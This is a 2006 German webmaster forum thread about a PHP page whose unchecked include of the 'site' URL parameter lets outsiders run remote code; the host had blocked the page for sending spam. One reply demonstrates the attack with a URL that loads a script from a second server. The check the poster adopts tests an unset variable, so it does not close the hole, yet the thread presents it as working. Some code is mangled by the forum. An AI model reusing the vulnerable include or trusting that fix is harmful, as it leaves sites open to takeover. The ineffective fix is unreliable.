webmaster resource
+ Webmaster Forum von Webmaster-Resource.de » Webcoding » PHP (Moderatoren: Christian Felken, » тнє $υι¢ι∂є « ™)
|-+ Sicherheitslücke in index.php??
Username:
Password:

Seiten: [1]
Topic Tools  
Read 03. November 2006, 12:49:20 #0
sonicweb

Sicherheitslücke in index.php??

Habe ein Problem. Mein Anbieter hat meine Index.php gesperrt weil von dort aus wohl Spammails verschickt werden. Doch ich kann nichts finden weil das einzige was in der Datei läuft ein include ist für die Navigation. Kann man aber über das Kontaktformular Spammails verschiekn, wenn man dort eindringt. Denn Die Kontaktformular hab ich ja von hier und habe sie an meine Seite eingebaut. Bitte helft mir da meine seite ist auf chmod 000 weil die Index so krass sein soll

soll ich denn die index.php mal hier posten?
Offline  
Read 03. November 2006, 13:00:22 #1
azettl

Re: Sicherheitslücke in index.php??

Zitat von: sonicweb
soll ich denn die index.php mal hier posten?

Ja, und am besten auch dein Kontaktformular  Smiley


"Lasst die Software aus ihrem Käfig, damit sie eine blutige Spur von Designern und Qualitätsprüfern hinter sich herzieht."
Offline  
Read 03. November 2006, 13:11:19 #2
Zabi

Re: Sicherheitslücke in index.php??

Zitat von: sonicweb

soll ich denn die index.php mal hier posten?


Falls da wirklich nur der include drinsteht bringt das wohl nicht viel - hast du einen server gemietet oder lediglich webspace ?
Welcher Anbieter ?


Die Neugier steht immer an erster Stelle eines Problems, das gelöst werden will.
(Galileo Galilei)

www.zabulus.de
Offline  
Read 03. November 2006, 13:23:49 #3
sonicweb

Sicherheitslücke in index.php??

habe bei 1und1 den Webspace
die haben mir geschreiben das ich ein prgrammiertfehler in der Index.php habe der include befehl erlaubt wohl das einsteigen von außen hier der code mit dem tipp von 1und1
Code:
<html>
<head>
<meta http-equiv="Content-Language" content="de">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>::[ - Anime Illusion - ]::</title>
<link href="dark.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.Stil2 {font-size: 9px}
td {
font-size: 12px;
background-color: #e6aa32;
}
-->
</style>
<script type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</head>

<body>
<div align="center">
  <center><table width="960"border="0" cellpadding="0" cellspacing="0" id="AutoNumber1" style="border-left:0px solid; border-bottom:0px solid; border-collapse: collapse; border-right-width:0; border-top-width:0">
      <tr>
        <td height="75" colspan="3" background="navibild/headeroben.jpg" style="border-left-width: 0; border-right: 0px solid; border-top: 0px solid; border-bottom-width: 0">
        <p align="center">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
          <iframe align=top width=468 height=60 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no src="http://www.anime-austria.at/exchange/view.php?uid=12&cat=0"><ilayer align=top width=468 height=60 src="http://www.anime-austria.at/exchange/view.php?uid=12&cat=0"></ILAYER> </iframe></td>
      </tr>
      <tr>
        <td height="143" colspan="3" valign="top" background="navibild/headerunt.jpg" style="border-left-width: 0; border-right: 0px solid; border-top: 0px solid; border-bottom-width: 0"></td>
      </tr>
      <tr>
        <td height="12" colspan="3" valign="top" style="border-left-width: 0; border-right: 0px solid; border-top: 0px solid; border-bottom-width: 0"><?phpif (strpos($variable'://') !== FALSE || strpos($variable'../') !== FALSE)
  die(
'Illegal string');
include(
"navileiste.php");
?>
</td>
      </tr>
      <tr>
        <td width="169" height="7" valign="top" background="navibild/navhintrechts.jpg" style="border-left-width: 0; border-right: 0px solid; border-top: 0px solid; border-bottom-width: 0"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><img border="0" src="navibild/headernav/basic.jpg" width="169" height="24"><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font><span class="Stil2"><font face="Verdana, Arial, Helvetica, sans-serif"><a style="text-decoration: none" href="index.php?site=mitte">Hauptseite</a><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font face="Verdana, Arial, Helvetica, sans-serif"><a style="text-decoration: none" href="index.php?site=news">News</a><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=proj">Projekte</a><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font face="Verdana, Arial, Helvetica, sans-serif"> <a href="index.php?site=gaestebuch">G&auml;stebuch</a> <br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.anime-illusion.de/wbboard/portal.php" target="_blank">Forum</a><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font face="Verdana, Arial, Helvetica, sans-serif"><a href="index.php?site=ai-kontakt" class="Stil2">Kontakt</a><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=hist">Historie</a> <br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=mitarb">Mitarbeiter</a> <br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=wiw">ABC</a> </font></span><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><br>
          <br>
          <img border="0" src="navibild/headernav/anime.jpg" width="169" height="24"><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=animegesch">Anime History</a> <br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=animeindex">Reviews</a><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=dvdcheck">DVD Check</a> <br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"><a href="index.php?site=topicanime"> Topic</a><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> Was ist mit..<br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=dateikontakt"><strong>Review schicken</strong></a><br>
          <br>
          <img border="0" src="navibild/headernav/manga.jpg" width="169" height="24"><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <a href="index.php?site=mangagesch">Manga History</a> <br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=mangarev">Reviews</a><br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> Topic <br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif">Was ist mit... <br>
          <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <a href="index.php?site=artbookrev">Artbooks</a><br>
          <img src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=dateikontakt"><strong>Review schicken<br>
          <br>
            </strong></a><img border="0" src="navibild/headernav/coszone.jpg" width="169" height="24"><img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font><a href="index.php?site=cosplay" class="Stil2"><font face="Verdana, Arial, Helvetica, sans-serif">was ist Cosplay </font></a><font face="Verdana, Arial, Helvetica, sans-serif" size="1"><br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=cosplaybericht">Berichte</a> <br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=cosplaybilder">Bildergalerie</a> <br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=cosplayvideo">Videos</a> <br>
            <img src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=magru"><strong>MaGruPiAH</strong></a> <br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=cosplay/sonic/hmtl/cosplaysonic">SONIC Cosplay</a> <br>
            <img src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=dateikontakt"><strong>Fotos schicken</strong></a><br>
            <br>
            <img border="0" src="navibild/headernav/fanst.jpg" width="169" height="24"><img src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=fachmags" class="Stil2"><font face="Verdana, Arial, Helvetica, sans-serif">Fachzeitschriften</font></a> <br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=messen">Messen/Cons</a><br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=interviews">Interviews</a><br>
            <img src="navibild/headernav/pfeil.jpg" width="72" height="7"><a href="index.php?site=gameindex"> Games</a><br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> Videotheken<br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> Comicshops<br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=greenhillbast">Bastel Dir's</a> <br><br>
            <img border="0" src="navibild/headernav/jmusic.jpg" width="169" height="24"><br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="index.php?site=anisound">Soundtracks</a><br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> Drama Music<br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> J- Pop <b><br>
            <img src="navibild/headernav/pfeil.jpg" width="72" height="7"> <a href="index.php?site=dateikontakt">Review schicken</a><br>
            <br>
            <img src="navibild/headernav/linkstuff.jpg" border="0"></b><img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <a href="index.php?site=linksall">Links</a><br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <a href="index.php?site=linkus">Link us</a> <br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> Shop <br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <a href="index.php?site=awards">Awards</a><br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> Erfahrungen<br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> Shop Links <br><br>
            <img src="navibild/headernav/comm.jpg" width="169" height="24"><img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> AI Darkzone <br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <a href="http://www.anime-illusion.de/wbboard/portal.php" target="_blank">Forum</a> <br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif">leer<br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.free-toplisten.at/listen/8514/index.html" target="_blank">Toplist</a><br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> leer<br>
            <img border="0" src="navibild/headernav/pfeil.jpg" width="72" height="7"> </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="index.php?site=imp">Disclaimer</a></a><br>
        </font></td>
        <td width="621" valign="top" bgcolor="" style="border-left-width: 0; border-right: 0px solid; border-top: 0px solid; border-bottom-width: 0"><div align="center"></div><?php if (strpos($variable'://') !== FALSE || strpos($variable'../') !== FALSE)
  die(
'Illegal string');
$page=$_GET['site']; include("$page.php"); ?>
</td>
        <td width="171" valign="top" background="navibild/navlinkshint.jpg" style="border-left-width: 0; border-right: 0px solid; border-top: 0px solid; border-bottom-width: 0"><p><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><img border="0" src="navibild/headernav/shaoutbox.jpg" width="171" height="24"></font><br>
            <font size="1" face="Verdana, Arial, Helvetica, sans-serif">
            <iframe src="http://123063.shoutbox.de/?extcss=http://www.anime-illusion.de/hovera1.css" width="108" height="200" frameborder="0" allowtransparency="true"></iframe>
            </font>
          <p><img src="navibild/headernav/mutli.jpg" width="171" height="24"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=sounda">Spr&uuml;che</a><br>
            <img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=bildlog">Anime VidClips </a><br>
            <img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=bildlogthem">Anime Themes</a> <br>
            <img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=download">Funbereich</a><br>
            <img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=musikvid">Musikvideos</a><br>
            <img src="navibild/headernav/punkt.jpg" width="7" height="7"> leer<br>
          </font><br>
          <img src="navibild/headernav/bilder.jpg" width="171" height="24"><font face="Verdana, Arial, Helvetica, sans-serif" size="1"><img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=galerie">Anime Bilder </a><br>
          <img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=galerieback">Desktopbilder</a><br>
          <img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=faneingang">FanArts</a><br>
          <img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=adult">Hentai</a><br>
          <img border="0" src="navibild/headernav/punkt.jpg" width="7" height="7"> leer<br>
          <img src="navibild/headernav/punkt.jpg" width="7" height="7"> <a href="index.php?site=dateikontakt"><strong>Pics einschicken</strong></a></font><br>
          <br>
          <img src="navibild/headernav/partner.jpg" width="171" height="24"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.ginas-anime.de" target="_blank"><img src="webbild/ginasbanner8mini.gif" width="88" height="31" border="0"></a></font><br>
          <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><b><a href="http://www.animemb.de.vu/" target="_blank"><img src="webbild/animeNBbutton.jpg" width="88" height="31" border="0"></a></b></font><br>
          <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><b><a href="http://www.aishite-night.de/" target="_blank"><img border="0" src="webbild/ashniteklien.jpg" width="88" height="31"></a></b></font><br>
          <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><b><a href="http://www.finalfantasyreal.de" target="_blank"><img src="webbild/ffrbanner.jpg" alt="Final Fantasy Real" width="88" height="31" border="0"></a></b></font><br>
          <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.anime-austria.at" target="_blank"><img src="http://www.anime-austria.at/images/Banner2.jpg" alt="Anime Austria" border="0"></a></font><br>
          <a href="http://www.zeldanime.de.vu" target="_blank"><img src="http://rinku.ri.funpic.de/images/banner/banner4.jpg" alt="ZeldAnime" border="0"></a><br>
          <a href="http://www.yellowpearl.de/" target="_blank"><img src="http://www.yellowpearl.de/banner2.gif" border="0"></a><br>
          <a href="http://www.cuteyhoneyflash.de" target="_blank"><img src="webbild/cutehonayde.png" width="88" height="31" border="0"></a><br><a href="http://www.anime-thunder.de" target="_blank"><img src="http://www.anime-thunder.de/Banner/A-T_3_88x32.jpg" border="0"></a><br>
          <a href="http://www.manga-group.de" target="_blank"><img src="http://www.manga-group.de/linkus/88x31_4.gif" border="0"></a><br>
            <br>
            <img src="navibild/headernav/vote.jpg" width="171" height="24"><br>
            <iframe src="table.html" width="110" height="200" frameborder="0" allowTransparency="true"></iframe>
        </td>
      </tr>
      <tr>
        <td colspan="3" style="border-left-width: 0; border-right: 0px solid; border-top: 0px solid; border-bottom-width: 0"><?phpif (strpos($variable'://') !== FALSE || strpos($variable'../') !== FALSE)
  die(
'Illegal string');
include(
"footer.php");
?>
</td>
      </tr>


Edit: Dieser Code weiß ich net wohin
if (strpos($variable, '://') !== FALSE || strpos($variable, '../') !== FALSE)
  die('Illegal string');
te ihn so eingebaut wo ich konnte bei PHPskripten
« Letzte Änderung: 03. September 2007, 18:17:23 von ρнρ-∂єνєℓσρєя »
Offline  
Read 03. November 2006, 19:31:47 #4
Claw

Sicherheitslücke in index.php??

Wenn deine Seite Spam verschickt, sollte doch irgendwo in deinem PHP Code ein mail() sein, oder nicht ?


Mfg Christof 'Claw' Wechselberger

Fragen richtig stellen
Offline  
Read 03. November 2006, 19:56:42 #5
DarkShadow

Sicherheitslücke in index.php??

Zitat
Wenn deine Seite Spam verschickt, sollte doch irgendwo in deinem PHP Code ein mail() sein, oder nicht ?


Kann ich nur zustimmen, aber ich finde nichts der gleichen...


Edit by Gott: So kann ich das nicht stehen lassen!
Programmiersprachen: C, C++, Assembler, HTML, PHP, SQL, CSS, JavaScript u.s.w.
Offline  
Read 03. November 2006, 20:12:44 #6
Daniel

Sicherheitslücke in index.php??

Eine Sicherheitslücke sehe ich in der Form wie Du Dateien einbindest:
Code:
<td width="621" valign="top" bgcolor="" style="border-left-width: 0; border-right: 0px solid; border-top: 0px solid; border-bottom-width: 0"><div align="center"></div><?php if &#40;strpos&#40;$variable, '&#58;//'&#41; !== FALSE || strpos&#40;$variable, '../'&#41; !== FALSE&#41; 
die&#40;'Illegal string'&#41;; 
$page=$_GET['site'&#93;; include&#40;"$page.php"&#41;; ?>
</td>


Die Übergabe des Dateinnamen der einzubindenden Datei über die URL halte ich für sehr unsicher.

Ich habe eben einen Test gemacht:
CODE Server1:
Code:

<?php
$page
=$_GET[site&#93;;
include &#40;"$page.php"&#41;;
?>

CODE Server2:(test.php)
Code:

<?php
echo "YOU ARE HACKED";
?>


URL: http://www.server1.de/indes.php?site=http://www.server2.de/test

Was war wohl die Ausgabe der Index.php auf Server1?

RICHTIG!!!!: YOU ARE HACKED

Daniel


Offline  
Read 03. November 2006, 23:03:22 #7
sonicweb

Sicherheitslücke in index.php??

habe mit etwas hilfe diesen code vor den include

if (strpos($variable, '://') !== FALSE || strpos($variable, '../') !== FALSE)
  die('Illegal string');

genommen.
Dieser soll den Zugriff auf den Includebefehl von außen verhindern. 1und1 blockt auch bisher nicht meine index.php mit chmod 000
also bisher scheint es zu klappen.
Ich danke euch leute für die total flinke antwort. Ihr seid klasse Sollte noch was kommen, komm ich noch mal.
Danke danke danke ihr seit cool
Offline  
Read 03. November 2006, 23:06:16 #8
Claw

Sicherheitslücke in index.php??

Ich würd solche "include" anfragen sowieso immer ber switch abfragen, und nen default einbauen ...


Mfg Christof 'Claw' Wechselberger

Fragen richtig stellen
Offline  
Read 03. November 2006, 23:16:32 #9
Daniel

Sicherheitslücke in index.php??

Code:
<?php

if&#40;is_file&#40;basename&#40;"$site.php"&#41;&#41;&#41; &#123;
include "$site.php";&#125;
else&#123;
die;&#125;
?>


Offline  
Read 04. November 2006, 01:09:19 #10
rob

Sicherheitslücke in index.php??

ich finde die ganzen dinge etwas unsicher gelöst, ich würde mit der funktion Switch arbeiten...

gruß rob
Offline  
Seiten: [1]
Gehe zu: